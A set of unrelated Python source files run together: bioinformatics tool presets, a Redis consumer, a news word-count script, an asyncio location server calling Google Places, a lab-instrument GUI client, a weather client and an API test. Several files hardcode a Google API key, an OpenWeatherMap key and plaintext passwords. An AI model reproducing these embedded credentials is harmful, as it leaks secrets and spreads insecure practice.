"-a": ("proteins", "_proteins.faa", "fasta"),
"-d": ("genes", "_genes.fna", "fasta"),
"-s": ("scores", "_scores.cds"),
},
preffix_tag=input_tag,
extra_flags=extra_flags,
)
return _prodigal
def _create_blast_preset(blast_type, sample, db, query_tag, outformat, extra_flags):
"""
:param str blast_type: What BLAST program to build (e.g. 'blastn');
:return: Instance of PresetProgram for the chosen blast program type.
:rtype: BioProv.PresetProgram.
"""
if db is not None:
db_dir = Path(db).parent.is_dir()
assert db_dir, "Path to the reference database does not exist"
_blast_program = PresetProgram(
name=blast_type,
params=(
Parameter(key="-db", value=db),
Parameter(key="-outfmt", value=outformat),
),
sample=sample,
input_files={"-query": query_tag},
output_files={"-out": (f"{blast_type}_hits", f"_{blast_type}_hits.txt")},
extra_flags=extra_flags,
)
return _blast_program
def blastn(sample=None, db=None, query_tag="query", outformat=6, extra_flags=None):
"""
:param Sample sample: Instance of BioProv.Sample.
:param str db: A string pointing to the reference database directory and title.
:param str query_tag: A tag for the query file.
:param int outformat: The output format to gather from blastn.
:param list extra_flags: A list of extra parameters to pass to BLASTN.
:return: Instance of PresetProgram for BLASTN.
:rtype: BioProv.PresetProgram.
:raises AssertionError: Path to the reference database does not exist.
"""
_blastn = _create_blast_preset(
"blastn", sample, db, query_tag, outformat, extra_flags
)
return _blastn
def blastp(sample, db, query_tag="query", outformat=6, extra_flags=None):
"""
:param Sample sample: Instance of BioProv.Sample.
:param str db: A string pointing to the reference database directory and title.
:param str query_tag: A tag for the query file.
:param int outformat: The output format to gather from blastp.
:param list extra_flags: A list of extra parameters to pass to BLASTP.
:return: Instance of PresetProgram for BLASTP.
:rtype: BioProv.PresetProgram.
:raises AssertionError: Path to the reference database does not exist.
"""
_blastp = _create_blast_preset(
"blastp", sample, db, query_tag, outformat, extra_flags
)
return _blastp
def muscle(sample, input_tag="input", msf=False, extra_flags=None):
"""
:param Sample sample: Instance of BioProv.Sample.
:param str input_tag: A tag for the input multi-fasta file.
:param bool msf: Whether or not to have the output in msf format.
:param list extra_flags: A list of extra parameters to pass to Muscle.
:return: Instance of PresetProgram for Muscle.
:rtype: BioProv.PresetProgram.
"""
_muscle = PresetProgram(
name="muscle",
sample=sample,
input_files={"-in": input_tag},
output_files={"-out": ("_muscle_hits", "_muscle_hits.afa")},
extra_flags=extra_flags,
)
if msf:
_muscle.add_parameter(Parameter(key="-msf"))
return _muscle
def mafft(sample, input_tag="input", extra_flags=None):
"""
:param Sample sample: Instance of BioProv.Sample.
:param str input_tag: A tag for the input fasta file.
:param list extra_flags: A list of extra parameters to pass to MAFFT.
:return: Instance of PresetProgram containing MAFFT.
:rtype: BioProv.PresetProgram.
"""
_mafft = PresetProgram(
name="mafft",
sample=sample,
input_files={"": input_tag},
output_files={">": ("aligned", "_aligned.afa")},
preffix_tag=input_tag,
extra_flags=extra_flags,
)
return _mafft
def fasttree(sample, input_tag="input", extra_flags=None):
"""
:param Sample sample: Instance of BioProv.Sample.
:param str input_tag: A tag for the input multifasta file.
:param list extra_flags: A list of extra parameters to pass to FastTree.
:return: Instance of PresetProgram containing FastTree.
:rtype: BioProv.PresetProgram.
"""
_fasttree = PresetProgram(
name="fasttree",
sample=sample,
input_files={"": input_tag},
output_files={">": ("tree", ".tree")},
preffix_tag=input_tag,
extra_flags=extra_flags,
)
return _fasttree
def kallisto_quant(sample, index, output_dir="./", extra_flags=None):
"""
Run kallisto's alignment and quantification
:param Sample sample: Instance of BioProv.Sample.
:param str index: A path to a kallisto index file.
:param str output_dir: A path to kallisto's output directory.
:param list extra_flags: A list of extra parameters to pass to kallisto
(e.g. --single or --plaintext).
:return: Instance of PresetProgram containing kallisto.
:rtype: BioProv.PresetProgram.
"""
_kallisto = PresetProgram(
name="kallisto",
params=(
Parameter(key="quant"),
Parameter(key="--index", value=index),
Parameter(key="--output-dir", value=output_dir),
),
sample=sample,
extra_flags=extra_flags,
)
input_files = [Parameter(key=str(fastq.path)) for fastq in sample.files.values()]
for read in input_files:
_kallisto.add_parameter(read)
return _kallisto
def prokka_():
"""
:return: Instance of PresetProgram containing Prokka.
"""
_prokka = PresetProgram(name=Program("prokka")) # no cover
def prokka(
_sample,
output_path=None,
threads=config.threads,
add_param_str="",
assembly="assembly",
contigs="prokka_contigs",
genes="prokka_genes",
proteins="prokka_proteins",
feature_table="feature_table",
submit_contigs="submit_contigs",
sequin="sequin",
genbank="genbank",
gff="gff",
log="prokka_log",
stats="prokka_stats",
):
"""
:param _sample: An instance of BioProv Sample.
:param output_path: Output directory of Prokka.
:param threads: Threads to use for Prokka.
:param add_param_str: Any additional parameters to be passed to Prokka (in string format)
The following params are the tags for each file, meaning that they are a string
present in _sample.files.keys().
:param assembly: Input assembly file.
:param contigs: Output contigs.
:param genes: Output genes.
:param proteins: Output proteins.
:param feature_table: Output feature table.
:param submit_contigs: Output contigs formatted for NCBI submission.
:param sequin: Output sequin file.
:param genbank: Output genbank .gbk file
:param gff: Output .gff file
:param log: Prokka log file.
:param stats: Prokka stats file.
:return: An instance of Program, containing Prokka.
"""
# Default output is assembly file directory.
prefix = _sample.name.replace(" ", "_")
if output_path is None:
output_path = path.join(
str(_sample.files[assembly].directory), f"{prefix}_prokka"
)
_prokka = Program(
"prokka",
)
params = (
Parameter(key="--prefix", value=prefix, kind="misc"),
Parameter(key="--outdir", value=output_path, kind="output"),
Parameter(key="--cpus", value=threads, kind="misc"),
)
for param in params:
_prokka.add_parameter(param)
if path.isdir(output_path):
config.logger.warning(
f"Warning: {output_path} directory exists. Will overwrite."
) # no cover
_prokka.add_parameter(
Parameter(key="--force", value="", kind="misc")
) # no cover
# Add files according to their extension # TODO: add support for SeqFile
extensions_parser = {
".faa": lambda file: _sample.add_files(File(file, tag=proteins)),
".fna": lambda file: _sample.add_files(File(file, tag=contigs)),
".ffn": lambda file: _sample.add_files(File(file, tag=genes)),
".fsa": lambda file: _sample.add_files(File(file, tag=submit_contigs)),
".tbl": lambda file: _sample.add_files(File(file, tag=feature_table)),
".sqn": lambda file: _sample.add_files(File(file, tag=sequin)),
".gbk": lambda file: _sample.add_files(File(file, tag=genbank)),
".gff": lambda file: _sample.add_files(File(file, tag=gff)),
".log": lambda file: _sample.add_files(File(file, tag=log)),
".txt": lambda file: _sample.add_files(File(file, tag=stats)),
}
for ext, func in extensions_parser.items():
file_ = path.join(path.abspath(output_path), _sample.name + ext)
_ = func(file_) # Add file based on extension
if add_param_str: # Any additional parameters are added here.
_prokka.cmd += f" {add_param_str}" # no cover
# Input goes here, must be last positionally.
_prokka.add_parameter(
Parameter(key="", value=str(_sample.files[assembly]), kind="input")
)
return _prokka
def kaiju(
_sample,
output_path=None,
kaijudb="",
nodes="",
threads=config.threads,
r1="R1",
r2="R2",
add_param_str="",
):
"""
Run Kaiju on paired-end metagenomic data.
:param _sample: An instance of BioProv sample.
:param output_path: Output file of Kaiju.
:param kaijudb: Path to Kaiju database.
:param nodes: Nodes file to use with Kaiju.False
:param threads: Threads to use with Kaiju.
:param r1: Tag of forward reads.
:param r2: Tag of reverse reads.
:param add_param_str: Add any paremeters to Kaiju.
:return: An instance of Program, containing Kaiju.
"""
kaiju_out_name = _sample.name + "_kaiju.out"
if output_path is None:
output_path = path.join(
_sample.files[r1].directory,
kaiju_out_name,
)
else:
output_path = path.join(output_path, kaiju_out_name) # no cover
_sample.add_files(File(output_path, tag="kaiju_output"))
kaiju_ = Program("kaiju")
params = (
Parameter(key="-t", value=nodes, kind="misc"),
Parameter(key="-i", value=str(_sample.files[r1]), kind="input"),
Parameter(key="-j", value=str(_sample.files[r2]), kind="input"),
Parameter(key="-f", value=kaijudb, kind="input"),
Parameter(key="-z", value=threads, kind="misc"),
Parameter(key="-o", value=output_path, kind="output"),
)
for p in params:
kaiju_.add_parameter(p)
if add_param_str:
kaiju_.cmd += f" {add_param_str}" # no cover
return kaiju_
def kaiju2table(
_sample,
output_path=None,
rank="phylum",
nodes="",
names="",
kaiju_output="kaiju_output",
add_param_str="",
):
"""
Run kaiju2table to create Kaiju reports.
:param _sample: An instance of BioProv sample.
:param output_path: Output file of kaiju2table.
:param rank: Taxonomic rank to create report of.
:param nodes: Nodes file to use with kaiju2table.
:param names: Names file to use with kaiju2table.
:param kaiju_output: Tag of Kaiju output file.
:param add_param_str: Parameter string to add.
:return: Instance of Program containing kaiju2table.
"""
# Assertion statement for rank argument.
assert_tax_rank(rank), Warnings()["invalid_tax_rank"](rank)
kaiju_report_suffix = f"kaiju_report_{rank}"
kaiju_report_out = f"{_sample.name}_{kaiju_report_suffix}"
# Format output_path
if output_path is None:
output_path = path.join(
_sample.files[kaiju_output].directory, kaiju_report_out + ".tsv"
)
_sample.add_files(File(output_path, tag=kaiju_report_suffix))
kaiju2table_ = Program("kaiju2table")
params = (
Parameter("-o", str(_sample.files[kaiju_report_suffix]), kind="output"),
Parameter("-t", nodes, kind="misc"),
Parameter("-n", names, kind="misc"),
Parameter("-r", rank, kind="misc"),
)
for p in params:
kaiju2table_.add_parameter(p)
# Add final parameter:
kaiju2table_.cmd += f" {str(_sample.files[kaiju_output])}"
if add_param_str:
kaiju2table_.cmd += f" {add_param_str}" # no cover
return kaiju2table_
|
import redis
import time
re = redis.Redis(host='localhost', port=6379,db=8, password=12345)
#re.set('key_name','value_test')
while True:
data = re.rpop("parkmsg")
print(data)
time.sleep(0.5)
|
import os
import numpy as np
import pandas as pd
import warnings
warnings.simplefilter(action='ignore', category=Warning)
import matplotlib.pyplot as plt
import seaborn as sns
def count_sensitive_words(df_, word_list_, str_col='Short_Msg', companies_neg_pos=None):
'''
Count number of sensitive words from `word_list_` within each day of news messages of `df_`.
word_list_ can contain strings or dictionaries with single key:value pairs,
where key is the outcome feature name and value is a list of strings to be matched with OR.
There will be also interactions of negative and positive counts with company names
in `companies_neg_pos` calculated.
'''
total_msg = df_.resample('1D').size()
for w in word_list_:
if not isinstance(w, dict):
#extract
df_['{}_count'.format(w)] = df_[str_col].str.count(w)
else:
df_['{}_count'.format(next(iter(w.keys())))] = df_[str_col].str.upper().str.count(r'|'.join(next(iter(w.values()))))
# if no companies_neg_pos is given- do interactions for all companies
if companies_neg_pos == None:
companies_neg_pos = [c for c in word_list_ if isinstance(c, str)]
# do actual interactions at the message level
for c in companies_neg_pos:
for w in word_list_:
if not isinstance(w, dict):
continue
key, value = next(iter(w.keys())), next(iter(w.values()))
df_['{}_{}_count'.format(c,key)] = df_['{}_count'.format(c)] * df_['{}_count'.format(key)]
# rename column names
df_.columns = [c.replace(' ', '_') for c in df_.columns]
# get the subset, that is interesting (counts)
count_cols = [c for c in df_.columns if '_count' in c]
# output dataset grouped by day
df_out = df_.resample('1D')[count_cols].sum()
# total number fo messages in a day
df_out['total_msg_count'] = total_msg
del df_
return df_out
def fe(df_):
'''
Feature engineering on Reuters Short_Msg BoW in general,
but so far it gets only the fractions of message counts
'''
for c in df_.columns:
if c == 'total_msg_count':
continue
df_[c.replace('_count', '_frac')] = df_[c]/df_['total_msg_count']
return df_ |
#when other servers are down, try&except
#when a client send the same message to two dif servers at the same time
import asyncio
import logging
import sys
import urllib.parse
import time
import json
from datetime import datetime
SERVER_NAME_LIST = {'Alford','Ball','Hamilton','Holiday','Welsh'}
SERVER_ADDRESS_LIST = {
'Alford':('localhost', 11000),
'Ball':('localhost',11001),
'Hamilton':('localhost',11002),
'Holiday':('localhost',11003),
'Welsh':('localhost',11004)}
PORT_NO = {
'Alford':11000,
'Ball':11001,
'Hamilton':11002,
'Holiday':11003,
'Welsh':11004}
TALKTO = {
'Alford':['Hamilton','Welsh'],
'Ball':['Holiday','Welsh'],
'Hamilton':['Holiday'],
'Holiday':[],
'Welsh':[]
}
COMTO = {
'Alford':['Hamilton','Welsh'],
'Ball':['Holiday','Welsh'],
'Hamilton':['Alford','Holiday'],
'Holiday':['Hamilton','Ball'],
'Welsh':['Alford','Ball']
}
def isFloat(str):
try:
float(str)
return True
except:
return False
def isInt(str):
try:
int(str)
return True
except:
return False
class Server:
def __init__(self, server_name,log):
self.name = server_name
self.IAmTalkee = {}
self.IAmTalker = {}
self.client_info ={}
self.update = set()
self.log = log
@asyncio.coroutine
def start_server_connection(self,talker):
try:
reader,writer = yield from asyncio.open_connection('localhost',PORT_NO[talker], loop=asyncio.get_event_loop())
except:
self.log.debug("Server {0} cannot connect to Server {1}".format(self.name, talker))
yield from asyncio.sleep(5)
asyncio.ensure_future(self.start_server_connection(talker),loop=asyncio.get_event_loop())
return
self.IAmTalker[talker] = (reader,writer)
msg = "IAmServer {0}\n".format(self.name)
writer.write(msg.encode())
yield from writer.drain()
self.log.debug("Server {0} connects to Server {1}".format(self.name, talker))
asyncio.ensure_future(self.listen_to_server(talker,reader,writer))
def IAmServer(self, msg_arr, reader, writer):
if len(msg_arr) != 2:
msg = (" ").join(msg_arr)
handle_error(msg, "Incorrect format for server connection message",writer)
talker_server = msg_arr[1]
self.IAmTalkee[talker_server] = (reader,writer)
self.log.debug("Server {0} got connected to Server {1}".format(self.name, talker_server))
asyncio.ensure_future(self.listen_to_server(talker_server,reader,writer))
return
@asyncio.coroutine
def reconnect_server(self, talker):
if talker in TALKTO[self.name]:
yield from asyncio.sleep(1)
self.log.debug("Server {0} trying to connect with Server {1}".format(self.name, talker))
asyncio.ensure_future(self.start_server_connection(talker))
@asyncio.coroutine
def listen_to_server(self, talker,reader,writer):
while True:
data = yield from reader.readline()
if not data:
self.log.debug("Server {0} is disconnected.".format(talker))
if talker in self.IAmTalker:
del self.IAmTalker[talker]
elif talker in self.IAmTalkee:
del self.IAmTalkee[talker]
self.log.debug("Will stop sending updates to Server {0}.".format(talker))
# yield from self.reconnect_server(talker)
asyncio.ensure_future(self.reconnect_server(talker))
break
else:
msg = data.decode()
self.log.debug("Message: {0} received by Server {1} from Server {2}.".format(msg,self.name,talker))
#handle AT message
msg_arr = msg.split()
if len(msg_arr) != 6:
self.log.error("{0} Wrong number of arguments for AT message from Server, should be 6 instead.".format(msg))
if self.checkShouldUpdate(msg, msg_arr):
usrname = msg_arr[3]
asyncio.ensure_future(self.updateServer(usrname,talker))
@asyncio.coroutine
def handle_connection(self,reader,writer):
data = yield from reader.readline()
msg = data.decode()
#handle message
msg_arr = msg.split()
if len(msg_arr) == 0:
self.handle_error(msg,"No argument",writer)
else:
self.log.debug("Message: {0} received.".format(msg))
if msg_arr[0] == "IAmServer":
self.IAmServer(msg_arr, reader, writer)
yield from writer.drain()
elif msg_arr[0] == "IAMAT":
if self.IAMAT(msg, msg_arr, writer):
#editting the AT message
usrname = msg_arr[1]
reply = self.client_info[usrname]
asyncio.ensure_future(self.updateServer(usrname,"Client"))
yield from writer.drain()
writer.close()
elif msg_arr[0] == "WHATSAT":
yield from self.WHATSAT(msg,msg_arr, writer)
yield from writer.drain()
writer.close()
else:
self.handle_error(msg,"Wrong format, the message should start with IAMAT, AT or WHATSAT", writer)
writer.close()
def handle_error(self, msg, error,writer):
writer.write("? {0}".format(msg).encode())
self.log.error("Error: {0} The incorrect message is {1}.".format(error,msg))
def IAMAT(self, msg,msg_arr, writer):
if len(msg_arr) != 4:
self.handle_error(msg, "Wrong number of arguments for IAMAT message, should be 4 instead.",writer)
return False
#reply the client
usrname = msg_arr[1]
location = msg_arr[2]
time_sent = msg_arr[3]
if not isFloat(time_sent):
self.handle_error(msg, "Wrong timestamp", writer)
return False
if not self.rightCords(location):
self.handle_error(msg,"Wrong coordinates format.",writer)
return False
time_sent_float = float(time_sent)
if time_sent_float < 0:
self.handle_error(msg,"Timestamps must be positive.",writer)
return False
time_now_float = time.time()
dif = time_now_float - time_sent_float
time_diff_string = ""
if dif > 0.0:
time_diff_string = "+" + str(dif)
else:
time_diff_string = "-" + str(dif)
part_reply = (" ").join(msg_arr[1:])
reply = "AT "+ self.name +" "+time_diff_string+" "+ part_reply + "\n"
writer.write(reply.encode())
#check if should update
if reply in self.update:
self.log.debug("Same IAMAT message received before: {1}, not propagating".format(msg))
return False
time_sent_float = float(msg_arr[3])
if msg_arr[1] in self.client_info:
client_cache = self.client_info[usrname]
client_cache_arr = client_cache.split()
client_cache_time = client_cache_arr[5]
client_cache_time_float = float(client_cache_time)
if time_sent_float > client_cache_time_float:
self.client_info[usrname] = reply
else:
return False
self.client_info[usrname] = reply
self.update.add(reply)
return True
@asyncio.coroutine
def updateServer(self, usrname,talker):
#propagate to other servers
reply = self.client_info[usrname]
reply_b = reply.encode()
self.log.debug("Updating servers.")
for server in COMTO[self.name]:
if server != talker:
if server in self.IAmTalker:
writer = self.IAmTalker[server][1]
writer.write(reply_b)
self.log.debug("Sending msg to Server {0}.".format(server))
yield from writer.drain()
self.log.debug("msg sent to {0}.".format(server))
elif server in self.IAmTalkee:
writer = self.IAmTalkee[server][1]
writer.write(reply_b)
self.log.debug("Sending msg to Server {0}.".format(server))
yield from writer.drain()
self.log.debug("msg sent to {0}.".format(server))
#for AT only, AT Alford +0.263873386 kiwi.cs.ucla.edu +34.068930-118.445127 1479413884.392014450
def checkShouldUpdate(self, msg,msg_arr):
if msg in self.update:
self.log.debug("Same AT message received before: {0}, not propagating".format(msg))
return False
time_sent_float = float(msg_arr[5])
usrname = msg_arr[3]
if msg_arr[3] in self.client_info:
client_cache = self.client_info[usrname]
client_cache_arr = client_cache.split()
client_cache_time = client_cache_arr[5]
client_cache_time_float = float(client_cache_time)
if time_sent_float > client_cache_time_float:
self.client_info[usrname] = msg
else:
return False
self.client_info[usrname] = msg
self.update.add(msg)
self.log.debug("AT message {0} updated.".format(msg))
return True
@asyncio.coroutine
def WHATSAT(self, msg, msg_arr,writer):
if len(msg_arr)!= 4:
self.handle_error(msg,"Wrong number of arguments for WHATSAT. Should be 3.",writer)
elif not isInt(msg_arr[2]):
self.handle_error(msg, "The third argument for WHATSAT should be an int.",writer)
elif not isInt(msg_arr[3]):
self.handle_error(msg, "The fourth argument for WHATSAT should be an int.",writer)
elif msg_arr[1] not in self.client_info:
self.handle_error(msg, "There is no info regarding this username.", writer)
else:
usrname = msg_arr[1]
num = int(msg_arr[2])
rad = int(msg_arr[3])
if num > 20 or num < 0:
self.handle_error(msg, "The information bound shoule be a positive int smaller than 20.",writer)
elif rad > 50 or rad < 0:
self.handle_error(msg, "The radius shoule be a positive int smaller than 50.",writer)
else:
info = self.client_info[usrname]
info_arr = info.split()
location = info_arr[4]
if not self.rightCords(location):
self.handle_error(msg,"Wrong coordinates format.",writer)
else:
index = 0
if location[0] == '+':
index += location.find('-',1)
else:
index += location.find('+',1)
lat = location[:index]
lon = location[index:]
yield from self.getGoogle(lat,lon,rad,num,writer,info)
def rightCords(self, location):
if location[0]!='+' and location[0]!='-':
return False
else:
cnt_s = 0
cnt_d = 0
for digit in location:
if not isInt(digit):
if digit == '+' or digit == '-':
cnt_s += 1
elif digit == '.':
cnt_d += 1
else:
return False
if cnt_s != 2 or cnt_d !=2 :
return False
return True
#https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=34.068930%2C-118.445127&radius=10000&key=AIzaSyAzjRcJm1rHvQDIdCRAeztgqQOJ3kZomvU
@asyncio.coroutine
def getGoogle(self,lat,lon,rad,num,writer_o,info):
if lat[0] =='+':
lat = lat[1:]
if lon[0] =='+':
lon = lon[1:]
location = lat +"," + lon
url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location="+urllib.parse.quote(location)+"&radius="+str(rad*1000)+"&key=AIzaSyAzjRcJm1rHvQDIdCRAeztgqQOJ3kZomvU"
url_p = urllib.parse.urlsplit(url.encode())
reader,writer = yield from asyncio.open_connection(url_p.hostname, 443, ssl=True)
#query = ('GET {path}?{query} HTTP/1.1\r\n' 'Host: {hostname}\r\n' '\r\n').format(path=url.path, hostname=url.hostname)
query = b'GET %b?%b HTTP/1.1\r\nHost: %b\r\nConnection: close\r\n\r\n' % (url_p.path, url_p.query, url_p.hostname)
writer.write(query)
self.log.debug("GET request sent to Google on location ({0})".format(location))
yield from writer.drain()
yield from reader.readuntil(b'\r\n\r\n')
response = (yield from reader.read()).decode()
parsed = json.loads(response)
if parsed['status'] == "OK":
parsed['results'] = parsed['results'][:num]
reply = json.dumps(parsed, indent=4)
writer_o.write(info.encode())
writer_o.write(reply.encode())
writer_o.write(b'\r\n\r\n')
yield from writer_o.drain()
else:
self.log.error("Error when acquiring info from Google at location ({0})".format(location))
def main():
if len(sys.argv) != 2:
sys.stderr.write("Wrong argument number {0}. Should be 2.\n".format(len(sys.argv)))
exit(1)
server_name = sys.argv[1]
if server_name not in SERVER_NAME_LIST:
sys.stderr.write("Invalid Server Name {0}\n".format(server_name))
exit(1)
logging.basicConfig(
filename=server_name+'.log',
level=logging.DEBUG,
format='%(name)s: %(message)s')
log = logging.getLogger(server_name)
loop = asyncio.get_event_loop()
ourServer = Server(server_name, log)
coro = asyncio.start_server(ourServer.handle_connection, 'localhost',PORT_NO[server_name],loop=loop)
asyncio.sleep(3)
for talker in TALKTO[server_name]:
asyncio.ensure_future(ourServer.start_server_connection(talker))
server = loop.run_until_complete(coro)
try:
loop.run_forever()
finally:
loop.close()
if __name__ == "__main__":
main() |
# Copyright (C) 2016 Calvin He
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from barium.lib.clients.gui.Scalar_gui import Scalar_UI
from twisted.internet.defer import inlineCallbacks, returnValue
from PyQt4 import QtGui, QtCore
class SR430_Scalar_Client(Scalar_UI):
BPRSIGNALID = 275309
BWSIGNALID = 275311
RPSSIGNALID = 275312
DLSIGNALID = 275313
RECORDSIGNALID = 275317
PANELSIGNALID = 275318
def __init__(self, reactor, parent = None):
from labrad.units import WithUnit
self.U = WithUnit
super(SR430_Scalar_Client, self).__init__()
self.reactor = reactor
self.initialize()
@inlineCallbacks
def initialize(self):
"""Initializes the client by setting up the GUI objects
"""
self.setupUi()
yield None
@inlineCallbacks
def self_connect(self, host_name, client_name, device_id):
"""Connects to LabRAD, the SR430 Scalar Server, and establishes LabRAD signal connections
"""
from labrad.wrappers import connectAsync
self.cxn = yield connectAsync(host=host_name, name=client_name, password="lab")
#try:
self.server = yield self.cxn.sr430_scalar_server
print 'Connected to SR430 Scalar Server.'
self.device_id = device_id
yield self.server.select_device(device_id)
yield self.server.signal__bins_per_record_changed(self.BPRSIGNALID)
yield self.server.signal__bin_width_changed(self.BWSIGNALID)
yield self.server.signal__discriminator_level_changed(self.DLSIGNALID)
yield self.server.signal__records_per_scan_changed(self.RPSSIGNALID)
yield self.server.signal__record_signal(self.RECORDSIGNALID)
yield self.server.signal__panel_signal(self.PANELSIGNALID)
yield self.server.addListener(listener = self.update_bpr, source = None, ID = self.BPRSIGNALID)
yield self.server.addListener(listener = self.update_bw, source = None, ID = self.BWSIGNALID)
yield self.server.addListener(listener = self.update_dl, source = None, ID = self.DLSIGNALID)
yield self.server.addListener(listener = self.update_rps, source = None, ID = self.RPSSIGNALID)
yield self.server.addListener(listener = self.record_update, source = None, ID = self.RECORDSIGNALID)
yield self.server.addListener(listener = self.panel_update, source = None, ID = self.PANELSIGNALID)
self.signal_connect()
#yield self.server.update_settings()
#except:
# print 'SR430 Scalar Server Unavailable. Client is not connected.'
@inlineCallbacks
def signal_connect(self):
"""Connects PyQt4 signals to slots
"""
self.sca_discriminator_level_spinbox.valueChanged.connect(lambda :self.set_discriminator_level())
self.sca_records_per_scan_spinbox.valueChanged.connect(lambda :self.set_records_per_scan())
self.sca_bins_per_record_select.currentIndexChanged.connect(lambda :self.set_bins_per_record())
self.sca_bin_width_select.currentIndexChanged.connect(lambda :self.set_bin_width())
self.sca_start_scan_button.clicked.connect(lambda :self.start_scan())
self.sca_stop_scan_button.clicked.connect(lambda :self.stop_scan())
self.sca_clear_scan_button.clicked.connect(lambda :self.clear_scan())
self.sca_get_counts_button.clicked.connect(lambda :self.get_counts())
self.set_trigger_frequency()
yield None
#The following updates the client GUI via LabRAD signals whenever settings are changed:
def update_bpr(self, c, signal):
if c.ID[0] == self.device_id:
argument_dictionary = {1024: 1, 2*1024: 2, 3*1024: 3, 4*1024: 4, 5*1024: 5,
6*1024: 6, 7*1024: 7, 8*1024: 8, 9*1024: 9, 10*1024: 10,
11*1024: 11, 12*1024: 12, 13*1024: 13, 14*1024: 14,
15*1024: 15, 16*1024: 16}
self.sca_bins_per_record_select.setCurrentIndex(signal-1)
def update_bw(self, c, signal):
if c.ID[0] == self.device_id:
argument_dictionary = {5: 0,40: 1,80: 2,160: 3,320: 4,640: 5,1280: 6,2560: 7, 5120: 8,
10240: 9, 20480: 10, 40960: 11, 81920: 12, 163840: 13, 327680: 14,
655360: 15, 1310720: 16, 2621400: 17, 5242900: 18, 10486000: 19}
self.sca_bin_width_select.setCurrentIndex(signal)
def update_rps(self, c, signal):
if c.ID[0] == self.device_id:
self.sca_records_per_scan_spinbox.setValue(signal)
def update_dl(self, c, signal):
if c.ID[0] == self.device_id:
self.sca_discriminator_level_spinbox.setValue(int(signal))
def record_update(self, c, signal):
if c.ID[0] == self.device_id:
self.sca_progress_bar.setValue(signal)
def panel_update(self, c, signal):
if c.ID[0] == self.device_id:
if signal == 'scanning':
self.frame_1.setDisabled(True)
self.frame_2.setDisabled(True)
elif signal == 'paused':
self.frame_1.setDisabled(True)
self.frame_2.setEnabled(True)
elif signal == 'cleared':
self.frame_1.setEnabled(True)
self.frame_2.setEnabled(True)
self.sca_progress_bar.setValue(0)
#Scalar Functions:
@inlineCallbacks
def set_discriminator_level(self):
discriminator_level = self.sca_discriminator_level_spinbox.value()
voltage = self.U(discriminator_level,'mV')
yield self.server.discriminator_level(voltage)
@inlineCallbacks
def set_records_per_scan(self):
records_per_scan = self.sca_records_per_scan_spinbox.value()
yield self.server.records_per_scan(records_per_scan)
self.sca_progress_bar.setMaximum(self.sca_records_per_scan_spinbox.value())
@inlineCallbacks
def set_bins_per_record(self):
bins_per_record = int(self.sca_bins_per_record_select.currentText())
yield self.server.bins_per_record(bins_per_record)
self.set_trigger_frequency()
@inlineCallbacks
def set_bin_width(self):
bin_width = int(self.sca_bin_width_select.currentText())
yield self.server.bin_width(bin_width)
self.set_trigger_frequency()
@inlineCallbacks
def set_trigger_frequency(self):
discriminator_level = self.sca_discriminator_level_spinbox.value()
records_per_scan = self.sca_records_per_scan_spinbox.value()
bins_per_record = str(self.sca_bins_per_record_select.currentText())
bin_width = str(self.sca_bin_width_select.currentText())
bins_per_record = int(bins_per_record)
bin_width = int(bin_width)
self.integration_time = bins_per_record*bin_width*records_per_scan*10**(-9)
self.trigger_period = (bins_per_record*bin_width + bins_per_record*250 + 150*(10**3))*10**(-6)+1
#trigger_period(ms) = (bpr*bw(ns) + bpr*250ns + 150us) + 1ms
self.trigger_frequency = round(1/(self.trigger_period*10**(-3)),3)
self.sca_integration_time_lcd.display(self.integration_time)
self.sca_trigger_frequency_lcd.display(self.trigger_frequency)
yield None
@inlineCallbacks
def start_scan(self):
self.set_bins_per_record()
self.set_records_per_scan()
self.set_bin_width()
self.set_trigger_frequency
self.set_discriminator_level()
yield self.server.start_scan()
@inlineCallbacks
def stop_scan(self):
yield self.server.stop_scan()
@inlineCallbacks
def clear_scan(self):
yield self.server.clear_scan()
@inlineCallbacks
def get_counts(self):
self.sca_counts_lcd.display('...')
counts = yield self.server.get_counts()
self.sca_counts_lcd.display(counts)
returnValue(counts)
#Close event:
@inlineCallbacks
def closeEvent(self, x):
yield None
self.reactor.stop()
import sys
if __name__ == "__main__":
a = QtGui.QApplication( [] )
import qt4reactor
qt4reactor.install()
from twisted.internet import reactor
client = SR430_Scalar_Client(reactor)
client.self_connect('planetexpress',"SR430 Scalar Client",0) #.self_connect(host_name, client_name, device_id)
client.show()
reactor.run()
|
import requests
from requests.models import HTTPError
from systemFunctions import speak, draw_text
def weather_data(query):
res=requests.get('http://api.openweathermap.org/data/2.5/weather?'+query+'&APPID=8de0c1d186a15c6c44a58c73ca31e976&units=metric');
# Check if city exists
if (res.json()['cod'] == '404') :
raise HTTPError
return res.json();
def print_weather(city, result):
# Print weather
w1 = ("{}'s temperature: {}°C ".format(city, result['main']['temp']))
w2 = ("Wind speed: {} meters per second".format(result['wind']['speed']))
w3 = ("Weather description: {}".format(result['weather'][0]['description']))
w = w1 + w2 + w3
print("{}'s temperature: {}°C ".format(city,result['main']['temp']))
print("Wind speed: {} m/s".format(result['wind']['speed']))
print("Description: {}".format(result['weather'][0]['description']))
print("Weather: {}".format(result['weather'][0]['main']))
draw_text(str(result['weather'][0]['main']))
speak(w)
def weather():
city = "Toronto"
try :
query='q='+city;
w_data=weather_data(query);
# print(w_data)
print_weather(city, w_data)
print()
except HTTPError :
print('City name not found...')
|
import pytest
from openapi_core.security.providers import HttpProvider
from openapi_core.spec.paths import SpecPath
from openapi_core.testing import MockRequest
class TestHttpProvider(object):
@pytest.fixture
def spec(self):
return {
'type': 'http',
'scheme': 'bearer',
}
@pytest.fixture
def scheme(self, spec):
return SpecPath.from_spec(spec)
@pytest.fixture
def provider(self, scheme):
return HttpProvider(scheme)
@pytest.mark.parametrize(
'header',
['authorization', 'Authorization', 'AUTHORIZATION'],
)
def test_header(self, provider, header):
"""Tests HttpProvider against Issue29427
https://bugs.python.org/issue29427
"""
jwt = 'MQ'
headers = {
header: 'Bearer {0}'.format(jwt),
}
request = MockRequest(
'http://localhost', 'GET', '/pets',
headers=headers,
)
result = provider(request)
assert result == jwt
|
import networkx as nx
import numpy as np
import dwave_qbsolv as QBSolv
import time
import statistics
